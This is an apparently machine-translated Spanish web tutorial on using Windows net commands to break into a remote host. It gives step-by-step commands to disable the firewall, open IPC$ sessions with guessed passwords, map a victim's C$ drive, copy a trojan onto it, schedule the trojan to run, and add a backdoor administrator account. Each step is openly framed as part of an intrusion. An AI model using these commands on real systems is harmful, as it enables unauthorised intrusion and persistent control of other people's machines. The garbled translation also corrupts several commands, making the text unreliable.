Windows dos ataque, algunos comandos para infiltrarse (1)

  

Algunos comandos y ejemplos de red de uso común: usaré 192.168.1.1 como ejemplo. Por lo general, si no podemos conectarnos pero no podemos hacer otras operaciones, podemos desactivar el firewall. Net stop
sharedaccess

1. Establezca la conexión ipC o el comando de asignación directa

net use \\\\ ip \\ ipc $ contraseña /usuario: nombre de usuario

net use \\\\ ip \\ abc nombre de usuario: admin $ 123

Por ejemplo:

net use \\\\ 192.168.1.1 \\ ipc $ 123456 /user: administrator

Este comando significa que la contraseña de usuario es 123456 con el nombre de usuario user adminidrator. Host 192.168.1.1 establece ipc $ null connection

2. Eliminar ipC $ empty connection

net use \\\\ ip /del

Por ejemplo:

Uso de red \\\\ 192.168.1.1 /del

Eliminar la conexión ipc $ establecida con el host 127.0.0.1

3. Iniciar el servicio de apagado:

net start \\\\ Servicio abierto

net start servername

net stop servername

Por ejemplo:

net start telnet \\\\ Open telnet service

net stop telnet \\\\ desactiva el servicio de telnet

4, comienza a cerrar el intercambio

net shate ipc $ \\\\ open ipc $ default share

net share IPc $ /del \\\\ cerrar ipc $ recurso compartido predeterminado

recurso compartido de red c = c: \\ \\\\ disco compartido de compartir completo

recurso compartido de red d = d: \\ \\\\ eliminar totalmente compartido d Disco

net share e $ = e: \\ \\\\ Crear disco e compartido compartido

5. Asignar disco duro

net use z: \\\\ ip \\ c $

Por ejemplo:

net use z: \\\\ 192.168.1.1 \\ c $ \\\\ Asigne el disco C de 192.168.1.1 al disco z de la máquina

Descripción: Después de que el mapeo sea exitoso Tendrá un disco duro Z en mi computadora, de hecho, Z es el disco C de 192.168.1.1.

net use z: /del \\\\ Disconnect mapping

La función de la intrusión: después de mapear el disco duro del otro, podemos copiar directamente el archivo al disco duro del otro.

Condiciones para una implementación exitosa: la conexión ipc $ debe establecerse con la otra parte

6. Copia remota file_Copy

Copy e: \\ 3389.exe \\\\ 192.168.1.1 \\ c $ \\ \\ Copie el archivo 3389.exe debajo del disco E local en el directorio raíz del disco C del otro sistema 192.168.1.1

El rol de Copiar en la invasión: copie el archivo local en el otro disco duro

Copie las condiciones requeridas para la replicación: debe establecer una conexión ipc $ con el host

7, ver la hora del sistema remoto

net time \\\\ ip

net time \\ \\ 192.168.1.1 \\\\ Ver la hora local del host remoto 192.168.1.1

Función: obtener la hora de la otra parte para prepararse para la tarea programada del troyano.

8. Ejecute el programa de forma remota

En \\\\ ip time server.exe

En \\\\ 192.168.1.1 12:30 c: \\ server.exe \\\\ Deje que el host se ejecute a las 12:30 del mediodía que hemos copiado El Trojan server.exe

en el directorio raíz de la unidad C funciona en la invasión: por lo tanto, podemos usar nuestro servidor Trojan para conectar nuestros troyanos y usar mejor el método gráfico para controlar el pollo de engorde. Use el genio ^ _ ^)

9, agregue la cuenta de administrador:

net user ylinuxs 123456 /add \\\\ agregue una contraseña para el usuario 123456 llamado ylinuxs

Red de administradores de grupos locales ylinuxs /add \\\\ Promueva ylinuxs como administrador o únase al grupo de administradores.

Nota: Algunos administradores de sistemas no son administradores. Debe seguir la situación real. Cambie, pero el grupo de administradores del 99.9% del sistema sigue siendo administradores.

Modifique la contraseña del usuario:

net user ylinuxs 123 \\\\ Cambie la contraseña del usuario ylinuxs a 123

10, login remoto del host _telnet

telnet Puerto ip

Por ejemplo: telnet 192.168.1.1 135 \\\\ Conectarse al puerto 135 del 192.168.1.1

Copyright © Conocimiento de Windows All Rights Reserved